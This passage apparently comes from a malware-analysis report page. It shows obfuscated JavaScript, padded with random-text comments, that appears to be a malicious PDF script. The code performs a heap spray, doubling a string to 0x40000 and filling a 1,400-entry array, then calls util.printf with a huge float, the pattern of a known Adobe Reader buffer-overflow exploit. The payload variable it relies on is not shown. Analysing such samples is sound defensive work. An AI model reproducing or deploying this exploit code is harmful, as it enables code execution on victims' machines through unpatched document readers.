UX2SalTxRHcwzYxjTE4UvtXO6A6rE0oZWerwE_jWHBI7Z6fs0YCuGa0Ba4se3V4Nzk_5jjQrkYn0SHrRftAmJ0nj3VCtq78ff7ZEfp*/
/*fCXDUfulAd*/BM=20/*pnUzG1PQnOY8arNOqNB_2AUXZhSQuzaXIPe0eulsHiIzvWe0YezkCwrjD8T3Xq_nJ9G5jzAH8z4TT2rxqGEs3vR6ExFRxsavyUUmUbjJT4dJkP1qUhhEzcwZP2qBjGwWaF0vhi61bX_Anzr8WOAKqxj6oP8MVtjwyigVpKgxKha_NWVbXgHJFCyU0_qribfG81LXAsKLPkKd7g5TBBcGDPbCPGuMP5eEF3FyBRCmbfi9Z20bTFfighynRlKgfplkgrXi9aJY7rWVhUw1ZQY7yLiFxtlRXL244*/;/*p1okOkQk6y5roT8BPvNy1_gbR4nIwfWMUAwjlCIf1CLdWIfl5sZts6K_*/vgxlV1St03Nch6r=BM+iF3HUFMvuX.length;/*OHjSewnfhLFkTlaWw5s6YTyGthznryae7_wZvY5Sk_35kRPVK9QjRDq_kemRSCvNBhmx6gEeg7YFNnbYkr93un2UGdlZfVmh3OTxvXUmkPLbkNKQJGvoCJthzdl22pKWZwW3X9e8MpYw4iCCpxqr8ZOw41mtexE4jav7YO4k5QWxzYzeLfLI5LwOgesSjl2_VxXkp9d7UPvtEO6jZDcz9NCdsvwRVnQqZoPEmt_80vpC_kmZnDNkQQD0AzPWbgB1JR6vA6s_pXBp8nDkrRK9hN7hCL5dr6T1MNlNHSMxq*/
/*um3fMiwWgSkb1nmtFToZI2nuDvCPise0UVeg5P4Zhd1XFcFLwul6kNon0r*/while(/*zvHMBrvhvE5oEisDS4Jc2SBCV_oVMIPK5XX6DIcyMWcR5KVMCep4wq7Hpjc2srBlDYgHh96tUWANgVajzEbluXsY7JPn2RO6qvBMt77CS7QzQqYFuzqdLX3HhHvXY*/DOYD5yQFCY6Q.length<vgxlV1St03Nch6r)/*wVzWiq7KRv6DKn_tJXdkD0B_Bpyb*/DOYD5yQFCY6Q+=DOYD5yQFCY6Q/*fTpVgSx64d3uNekhlCI_iemFW2YIlwa2EFMB_gPcX_q3jNcmVcKzEPK6oTfZtWezjFLilbA0aq1_4SmOvxC1*/;/*xupgPEPmjEKoQtPrtOHZDHRWugHgiHYWfts0PlNH_vl1IrSN4D8d9hrmJpSCKrZqZGoos3wrmWhuDz9736Y1bEblutn6ZCkzIc2FNiskEco4ajvU8lvBBWwv_qJBQ9SaBkojROnu3gJaRdX3OZ5lKok2ylHwwmLxL1VdD0M6fVVxzsoDHioSLNI_zQvk38*/
/*Iwrgzqtu*/
/*JE85xl85Jl*/LMMOHzOq=DOYD5yQFCY6Q.substring(/*KDuSPdOKfhFvWWaubKiGouef3BnnYAmqEW0Tz*/0,vgxlV1St03Nch6r/*GbFPf57aENL0QVlPDunhTrfUqg_e86eYC1ohuj9ywIxCdXShUDbmjvSEvxBpQasGDO1nMoZUabyxtV5oZVQ9FjC1VEfmeMsibiKnLk9lAwYtGSXgnodtMgjilDJEP3nrZyTkXRLXCjGJ2epeIIMUov4OyBTD48vRuE3HVCfWmhdGM8OUIj04bNrcgvVdfnNjeU6h1SIb1mhBiwWqUUjviPNEAihfKuEpE0M5RVVG84IeoeJ9zttX97*/)/*dd9eosiTwhfqy1A6w4CPghZeWHMuFHKDlIhP1FimmCSa3SVoLY4r7SKSZXBffLiFUFVKK4wx7DNxWiah8TO3lYJAwKfQWDWqIr2TkmGfqUSC4tjzBxqnL1n8_INWL*/;/*PwrNS8Rhi1lte2buiK9qjBy2XhWfD6clqJy9FEfo6GWZ9yIg9FLgG0Wegt_jnbJSk8QpBv*/
/*OzUTnkEMcAifwPBl7uUFyYCrKooExPPHDjbqJf3lfaF*/xktOqvnkBrtOrbJm=DOYD5yQFCY6Q.substring(/*oTukEF7ezWpXdSH9y00alWbNCfjAzYNSr83wCyQ2J6NnMUkATib663H8Xr9LEKe*/0,DOYD5yQFCY6Q.length-vgxlV1St03Nch6r/*ZUP4n1rULDmN7VwuWja_vPnrPv5m8doQtg5iBn4MrfZm1LWMvxLfBzMRjF4gjhxRCq1ETsQ_MqmB39NmuZHwNTDxZ7S9cFOfvDkEw*/)/*T9gp_YnNA*/;/*L2pVzcdUajg8peSJABIjokt7JqLzs8Hoxw_mOd7pBblr752760fiiOds6phmloQYaP_pt7TuW5bSxROrQuPy9tg3XCe0quXG_XvsSEcp948vJLca6rN3auuywIG3l2LrpkuWvX_zKODRSns9wN1WsPc_6j2gaCMEn7aXTaLdpPu84c5opuAX_dX5CNZcQmg4h8P1WbTArC9jf3NfOikr6euI5LYfsQCog4_9LAoO0Nt1a5bpbAVWfEeYQ459J8lpzln_mQNle8a522iS35oX0IwPAqMJmzaZbaBsomLlCFb5ouwiYIhg5whk0rLxgmM9BNqq13Q38swlbhJ1prVjd4IbkUOF7aC9osnek5VhlGHCnR3S9N3aFA3pUFvQgyNJg2nF*/
/*tmUFuXtAOB9c4Yi5PNOV9e2vsARioWRn9msr0bsNcqqVDNOTadoY9fJpgaNKxfxuGfbF7JTXz0s4M8Mma2AXVKB3kPBWuyG1Si7NrPlgNTZZQlBqbCCxMEoxTpJCdP*/
/*Gyz0fDkAQ4ZqJ_szau2M762tOf3Q0GIu68sZASZQLz8UzoIPY_cU6SCIy5ZwAif6fNTfftvrisAWWJluJDDDVFMI_l6_IZ5nnM*/while/*RWhJJx_TsN76if62D*/(/*R9N56kk4wpCPbKl9UuvTCch0XEeR7hnrf1laaLSL1VbQfCOzx_I1cqyzuRGqytXSj9t_IAK0VmP1oepadyP7dDuMU24IkPbJNJI*/xktOqvnkBrtOrbJm.length+vgxlV1St03Nch6r<0x40000/*cHJ1aMmzI6wl_AFvEqz2g4yBhyaKAainhrc94ExB_im_jsuoXje4bS60FUIGvqtSXLPQQBRPk5PJl0x0*/)/*s20jw8oFFv2wdIIpYY6ZqK_jZIJY7I7M06wuT74zdlzz80aqHduKzzPy93yGRru553Czv2SVqHSoh9vAs7zgSxUQoHW7zF1s93hsszDY7VBdTweArSh_F3Pt_loyrefpVCXD2abxwcPEOtF7Bm6GdJ1dveQc9wHSyeWp5xbpPqudZzYab*/
/*S6dWXO1nqxZxFNRb3KNS1c0j7XYTyznUtFrFTgt_THxYVD1MODfDfdnb2AupzX_icqnvM*/xktOqvnkBrtOrbJm=xktOqvnkBrtOrbJm+xktOqvnkBrtOrbJm+LMMOHzOq;/*Vc8Ji8gTozXFeV0bFImiigPvYpfHcQVOsSXQO5j3t89MR7nXDP6lvJWIy2QQHlez52EHuo_dk8p24SO7hIhSS5bGvrW3S1rLqvTazgeh6zluAzxg3S0et1fdeT1d3RJfCW2y3VUwJ6gKtSqlkpFTekw05lcv4mP79GtzbDll9GvrZbS_FXSk8Di2pAlim2ej8MYYQSOFu6eLMdRkw2g1ZWfa9DByhlvu0J_0IND4IiDVBV6xLbnlyHBvKCjrnUbmealmoofwMjGO5BBFcorPwsA7uknX5D_YekAHOf4bE_p9AqCcUusFbtBLSoiMsikLHlT*/
/*SLxJLbHLHKoc5*/GWn=new/*eF6YpmwL6MF2VTE0TsPUh1rFfCku0cGdiB2MnnYizeZJxeIFLYatOHztKYdI1klYzkNE0w5cKDPoMV1kwiz5XiDvALllw0LNjZSiKLAUPQ9blyBXV1QsXTdYeEFDKenjwKt9LDMbBnBzoYKep439WQcaPteZM*/ /*r9Ss6dvH5xu7lYUv40ou8_AYaPH6oTBnRTUMwETq2Clcb6NT52D11DOQTVK9oLk7f5HQ9a8zdhQ6cdOVURLJVZaovklYwKUQDbhB3d1UAGOckcy5u0DFYdtICUhzf*/Array(/*BTUe6jUjC00gwObORLblo18Kqtoz3SMPMm7XmewvoKqwG4vApf3EVzOAi31ZKCpXokuPEgAsqqe*/)/*qOxNuoSEdgFAY6Zj8D7lop2sK2Z2g5nFIZT3Dl7gHBhg78E4A_dopTV1JvqqoTwxsEovpkRxlr4_Pi1H1DDXMlpeeFlOx8FFwwRchk484w7ITwPJVgB5LgYRGmDCsJzeaQBAI9555BNpRWek4geEB4VIeMMi_r0Ps0Yq3Sj5gOK4svvN*/;/*gPGLXlkiyIheHxMFL49ec2_qB3YwnmAd3GoPsNxgWUAdHMjSFhxhYxNZpmKROKuFRXU_lHf8bfais02xgoU5aiSEKdWYoGd7ey6E6aBW6b6*/
/*iUEjfWMDi6lIFstZEzk20vRF8ZPl2I8YcA89XJA6ElDKTwjXlINj5fo265bwCXKfYGcvQc*/for/*TtmjJvwT4HcLb7G_PpCOniA3_OIKquM_dzinjT7ba*/(/*E2Tt2jX4xAbx4aBAlsvyrNmO1Kiwm9IOzc9qAVjyWAlOamOBT01AMbOBmwyOu7djXaOYwyLHywVOYjPsi*/QAU=0/*Pwa7Zu11SI6clQ2PWTK1HF6Cf7YaXSCyEcudMjTfrN8Sdxh1GspOykQ*/;/*lot48wqAOaea0x7q_49cqfSwM9A_hQSC6B63xl3AAVb0IWoHPmk6G3qTzrTW8lY3nS*/QAU<1400;/*b5la5824ENhMcIxWPoCjdu31rdNiFgQeZ26SxwL30tDb31yGe2p9k*/QAU++/*NhvWZvW3YALu1UegAIzw6g1jRfIjRuXkQH7q3Si*/)/*Yt_ICdoDldzg_oEQJNzb9LAOT85KObahKZqN4TQMDtfXfDuGM9pGdT8XNYJPwTuKaL6qokAsTfEzjz6vwk2rynFMwV9EEHeQCK5nLl8qqvPeq_QP2fHpIN25jz9n8c40mxmxYidDSti9szMjTUNciEVG4TuzvnyXZZKy8o3PWZMDNZnhu10S6UZxnImYvavKz70wjL6P*/
/*UdnlAXb_pVTDI8MuU8JFH0AFuk7veK0comCo0ennz7r834rM11R9zSCi30TWJSyx52a3UDfJ0LF2DwD5mV2an50f4R2BjpycfNU1Qz0P_DGD1J9cfy3Hs1nkHelrI*/GWn/*gzzJe3AJDMROq6Wvt*/[/*BtgErhpK7Nv1u4oiBIZCSdPkr6eCqNqU7MYmtDxpQheAaIjbR9djbtIHnnKT12nwCBYwFKaVs6WHC6jU4C4Tv*/QAU/*GYolrdbUPeWnPbxqxflImoCK97N2P93qVgRC_tWOMs2cJoI7ItDvWG6UBiRFC8biNdh81wJimlrPumYdK1wDJyLTERWBs5OKbLA*/]/*Jiy7PDp2cHgk9RoGFzaJFwKypZ0Fk0S6hF1wJemlmI*/=xktOqvnkBrtOrbJm+iF3HUFMvuX/*CQ__zEfEj57dMtOYlNGop0edE9Tu75QsKQs0VND5H0XUsmsS1z8exa83YQmTJ4BTIuRe8VXDTvXBXFUM6QqrrnjE4KYCDZWMJnqF0*/;/*eSygTKmnWg5CNkqxoi9C*/
/*Anmdd4RbIRfPVVZSx5Fo*/var/*kjRlkIEadEh*/ /*nGKV_5TD0rgszjBWXhMbFeCqnHFFLmxtt8Dt2XwzDRh41jONFbpK6r1hy7m_iZtQWw_NI*/bUJR8tSnc=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;/*wc*/
/*zeoYlH0SPXb4_5V4LwAdRPymoFYhLCi0gMWHTVZjt1bsuxk7jlY11LceR1Bc4kbYwyfFI5p2uGje4IZctxSj0uDPkFscpI2b8VhFPL8*/util.printf/*pvg7xIskWbfzA4POQABcHzNcClBSTkXAU58HCorYFMNGEdUVeWxlLADOmFh6q57Ay3H1gyOm_csE6CaYYN_kNCyzIVu*/(/*npyCh73DtFpthXxcZN1yazYn3McAhMy*/"E000f",bUJR8tSnc)/*bE_wtEC3S2TPCTeVPXgez7B_VrMNAcrxhqiPvkHCbaSeuw1_JVe0Rf9mLJzLmg9IMgX8Gf_i7RBpD2pMMIKdnIFzR5_4Z9AleYik5*/;/*Flk3qi611tWI59wPepSsP9e5gb7*/

Open this report in the interactive analyzer, or submit your own file for analysis.